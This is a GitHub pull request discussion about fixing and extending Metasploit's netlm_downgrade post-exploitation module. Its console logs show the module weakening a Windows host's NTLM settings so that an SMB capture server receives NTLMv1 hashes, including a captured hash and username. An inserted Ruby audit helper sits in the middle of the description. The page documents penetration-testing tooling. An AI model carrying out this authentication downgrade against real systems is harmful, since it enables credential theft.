
netlm_downgrade: Cleanup and support non-Meterpreter sessions #17092

Merged
merged 1 commit into from
Oct 12, 2022

Conversation

bcoles
Contributor

@bcoles bcoles commented Oct 1, 2022

Resolves Rubocop violations.

Adds documentation.

Adds Notes module meta information.

Fixes multiple bugs:

  • platform was not defined, causing an error: [!] SESSION may not be compatible with this module. Clearly a lie.
  • If the LmCompatibilityLevel registry value did not exist (default on modern Windows systems) the module would fail with an error: [-] Issues enumerating registry values. This is not a failure condition. Creating the key creates the desired behaviour.
  • The module used the Windows::WindowsServices mixin which has been deprecated and also isn't required. Removed.

Adds support for shell and powershell sessions. Sadly, the module dies halfway through (immediately after the cmd_exec call) on PowerShell sessions. Not only does this break the remainder of module execution, it also breaks the sessions. I'm fairly certain this is a bug with handling of cmd_exec for PowerShell sessions.


Before

msf6 post(windows/gather/netlm_downgrade) > rexploit
[*] Reloading module...

[-] The Windows::WindowsServices mixin is deprecated, use Windows::Services instead
[!] SESSION may not be compatible with this module:
[!]  * incompatible session platform: windows
[-] Issues enumerating registry values
[*] Post module execution completed

After

msf6 post(windows/gather/netlm_downgrade) > rexploit 
[*] Reloading module...

[*] Running module against WIN-7V3NGVNQTJ1 (192.168.200.215)
[*] NetLM authentication is disabled (LmCompatibilityLevel: nil). Enabling ...
[+] NetLM authentication is enabled
[*] Establishing SMB connection to 192.168.200.130
[+] SMB server 192.168.200.130 should now have NetLM hashes
[*] Restoring original LM compatibility level (LmCompatibilityLevel: nil)
[*] Post module execution completed
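The second bug listed above (an absent LmCompatibilityLevel value is the normal state on modern Windows, not a failure) is the same nil handling a defender's registry audit needs. The following is an added example, not code from the netlm_downgrade module or the Metasploit code base: a Ruby helper that parses `reg query` output for the Lsa key, treats a missing value as the OS default, and flags levels at which the host still sends LM or NTLMv1 responses (the state the module creates and restores). The `reg query` text, the level table and the `parse_lm_compat_level` / `assess_lm_level` names are constructed for this example.

```ruby
# Added audit helper (not Metasploit/netlm_downgrade code): read LmCompatibilityLevel
# the way a defender would, treating an absent value as the OS default, not an error.
LSA_KEY = 'HKLM\SYSTEM\CurrentControlSet\Control\Lsa'.freeze
VALUE_NAME = 'LmCompatibilityLevel'.freeze

# Meaning of each level (Microsoft's documented values).
LEVELS = {
  0 => 'Send LM & NTLM responses',
  1 => 'Send LM & NTLM; use NTLMv2 session security if negotiated',
  2 => 'Send NTLM response only',
  3 => 'Send NTLMv2 response only',
  4 => 'Send NTLMv2 response only; refuse LM',
  5 => 'Send NTLMv2 response only; refuse LM & NTLM'
}.freeze

# Parse the text output of `reg query <LSA_KEY> /v LmCompatibilityLevel`.
# Returns the Integer level, or nil when the value does not exist (the default on
# modern Windows, which the original module treated as a failure).
def parse_lm_compat_level(output)
  return nil if output =~ /unable to find the specified registry key or value/i
  m = output.match(/#{VALUE_NAME}\s+REG_DWORD\s+(0x[0-9a-f]+|\d+)/i)
  m ? Integer(m[1]) : nil   # Integer() accepts both "0x3" and "3"
end

# Classify a level. nil means the OS default applies (3 on Vista/2008 and later).
# :ntlmv1_exposed is true when the host will still send LM or NTLMv1 responses,
# which is exactly the state netlm_downgrade creates (and should restore).
def assess_lm_level(level, os_default: 3)
  effective = level.nil? ? os_default : level
  raise ArgumentError, "unknown LmCompatibilityLevel #{effective}" unless LEVELS.key?(effective)
  { configured: level, effective: effective,
    description: LEVELS[effective], ntlmv1_exposed: effective <= 2 }
end

# Constructed sample `reg query` outputs (not captured from a real host).
MISSING = "ERROR: The system was unable to find the specified registry key or value.\n"
DOWNGRADED = "\r\nHKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\r\n" \
             "    LmCompatibilityLevel    REG_DWORD    0x0\r\n"

if __FILE__ == $PROGRAM_NAME
  [MISSING, DOWNGRADED].each do |out|
    r = assess_lm_level(parse_lm_compat_level(out))
    puts "#{VALUE_NAME}=#{r[:configured].inspect} -> #{r[:effective]} (#{r[:description]}), NTLMv1 exposed: #{r[:ntlmv1_exposed]}"
  end
end
```

Run it against the output of `reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v LmCompatibilityLevel` from each host; any `ntlmv1_exposed: true` result means the client will answer a rogue SMB server with capturable NTLMv1 hashes.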

@adfoster-r7
Contributor

I'm fairly certain this is a bug with handling of cmd_exec for PowerShell sessions.

This might be fixed by #17072 - I haven't tested though.

@bcoles
Contributor Author

bcoles commented Oct 1, 2022

I'm fairly certain this is a bug with handling of cmd_exec for PowerShell sessions.

This might be fixed by #17072 - I haven't tested though.

Nope.

msf6 post(windows/gather/netlm_downgrade) > rexploit 
[*] Reloading module...

[*] Running module against test (192.168.200.190)
[*] NetLM authentication is disabled (LmCompatibilityLevel: nil). Enabling ...
[+] NetLM authentication is enabled
[*] Establishing SMB connection to 192.168.200.130
[+] Received SMB connection on Auth Capture Server!
[SMB] NTLMv1-SSP Client     : 192.168.200.190
[SMB] NTLMv1-SSP Username   : TEST\user
[SMB] NTLMv1-SSP Hash       : user::TEST:a27e689ddbcf86e500000000000000000000000000000000:34592cf2438e1ac29452b1db417e4c8d094f67258dedfe72:bac819dc90f9f159

[+] SMB server 192.168.200.130 should now have NetLM hashes
[*] Restoring original LM compatibility level (LmCompatibilityLevel: nil)
[-] Could not restore original LM compatibility level # <-- session is toast
[*] Post module execution completed
msf6 post(windows/gather/netlm_downgrade) > rexploit
[*] Reloading module...

[*] Running module against  (192.168.200.190)   # <-- Note the `hostname` command returned no results this time. The session is toast.
^C[-] Post interrupted by the console user
[*] Post module execution completed
msf6 post(windows/gather/netlm_downgrade) > 

@bwatters-r7
Contributor

I'm not seeing the crash on Windows 10x64 v1803? Might I ask what OS you were using?

msf6 post(windows/gather/netlm_downgrade) > [*] Powershell session session 4 opened (10.5.135.101:5678 -> 10.5.134.168:50858) at 2022-10-03 16:55:00 -0500

msf6 post(windows/gather/netlm_downgrade) > set session 4
session => 4
msf6 post(windows/gather/netlm_downgrade) > run

[*] Running module against DESKTOP-D1E425Q (10.5.134.168)
[*] NetLM authentication is disabled (LmCompatibilityLevel: nil). Enabling ...
[+] NetLM authentication is enabled
[*] Establishing SMB connection to 10.5.134.168
[+] SMB server 10.5.134.168 should now have NetLM hashes
[*] Restoring original LM compatibility level (LmCompatibilityLevel: nil)
[*] Post module execution completed
msf6 post(windows/gather/netlm_downgrade) > sessions -i 4
[*] Starting interaction with 4...

PS C:\Users\msfuser\Desktop> ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::5828:454b:7874:f3a5%13
   IPv4 Address. . . . . . . . . . . : 10.5.134.168
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.5.134.1
PS C:\Users\msfuser\Desktop> 

@bcoles
Contributor Author

bcoles commented Oct 3, 2022

I'm not seeing the crash on Windows 10x64 v1803? Might I ask what OS you were using?

Windows 7, Windows 2016. Maybe Windows 11 also.

@bwatters-r7 bwatters-r7 self-assigned this Oct 6, 2022
@bwatters-r7 bwatters-r7 merged commit 4aa2b76 into rapid7:master Oct 12, 2022
@bwatters-r7 bwatters-r7 added rn-fix release notes fix rn-enhancement release notes enhancement labels Oct 12, 2022
@bwatters-r7
Contributor

Release notes

This PR updates the netlm_downgrade module, providing documentation, extending it to support more session types, and fixing some bugs that were present which caused false-positive warnings to appear.

@bcoles bcoles deleted the netlm_downgrade branch October 13, 2022 01:34